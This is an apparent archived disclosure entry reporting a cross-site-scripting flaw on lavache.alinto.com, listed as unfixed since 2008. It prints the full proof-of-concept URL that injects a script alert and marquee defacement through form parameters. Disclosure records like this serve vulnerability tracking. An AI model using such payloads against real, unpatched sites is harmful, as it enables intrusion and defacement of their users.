Security researcher xylitol, has submitted on 23/07/2008 a cross-site-scripting (XSS) vulnerability affecting lavache.alinto.com, which at the time of submission ranked 126643 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 26/07/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 23/07/2008 |
Date published: 26/07/2008 |
Fixed? Mail us! | Status: UNFIXED |
Author: xylitol |
Domain: lavache.alinto.com |
Category: XSS |
Pagerank: 126643 |
URL: http://lavache.alinto.com/create/create_basic.php?fm1_boite=%27%22%3E%3Cscript%3Ealert(1337)%3C%2Fsc ript%3E%3Cmarquee%3E%3Ch1%3EXSS+BY+XYLITOL%3C%2Fh1%3E%3C%2Fmarquee%3E&fm2_mdp1=%27%22%3E%3Cscript%3E alert(1337)%3C%2Fscript%3E%3Cmarquee%3E%3Ch1%3EXSS+BY+XYLITOL%3C%2Fh1%3E%3C%2Fmarquee%3E&fm2_mdp2=&S ubmit.x=55&Submit.y=4&etap=1&fm1_nom=Speed&fm1_prenom=Pseudo&fm3_datenais=10%2F04%2F1980&fm1_adresse =103+rue+SpeedPseudo&fm1_cp=10000&fm1_ville=SpeedPseudo&fm1_pays=FR&fm1_civ=1&situation=1&fm2_typere cup=altern&fm2_altern=carter%40live.fr&lieucnx=1&activite=101§eur=1&EDUCATION=3&tpslibre[0]=0&tp slibre[1]=1&proprio=0&enfmoins=0&cnx=6&fm1_jaccepte=oui |
Click here to view the mirror
|
|
|